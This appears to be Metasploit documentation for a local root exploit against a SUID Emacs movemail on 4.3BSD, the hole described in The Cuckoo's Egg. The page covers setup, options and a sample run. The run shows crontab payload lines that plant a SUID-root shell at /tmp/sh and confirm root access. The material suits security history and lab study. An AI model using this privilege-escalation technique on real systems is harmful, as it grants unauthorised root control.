Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
62 lines (46 sloc) 1.69 KB

Intro

This module exploits a SUID installation of the Emacs movemail utility to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local. The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.

Setup

A Docker environment for 4.3BSD on VAX is available at https://github.com/wvu/ye-olde-bsd.

For manual setup, please follow the Computer History Wiki's guide or Allen Garvin's guide if you're using Quasijarus.

Targets

Id  Name
--  ----
0   /usr/lib/crontab.local

Options

MOVEMAIL

Set this to the absolute path to the SUID-root movemail executable.

CMD

If your payload is cmd/unix/generic (suggested default), set this to the command you want to run as root. The provided default will create a SUID-root shell at /tmp/sh.

Usage

msf5 exploit(unix/local/emacs_movemail) > run

[*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
[*] Current shell is /bin/sh
[*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
[+] SUID-root [redacted] found
[*] Preparing crontab with payload
* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
* * * * * root rm -f /usr/lib/crontab.local
[*] Creating writable /usr/lib/crontab.local
[+] Writing crontab to /usr/lib/crontab.local
[!] Please wait at least one minute for effect
[*] Exploit completed, but no session was created.
msf5 exploit(unix/local/emacs_movemail) > sessions -1
[*] Starting interaction with 1...

ls -l /usr/lib/crontab.local /tmp/sh
/usr/lib/crontab.local not found
-rwsr-xr-x  1 root        23552 Nov 22 15:17 /tmp/sh
/tmp/sh -c whoami
root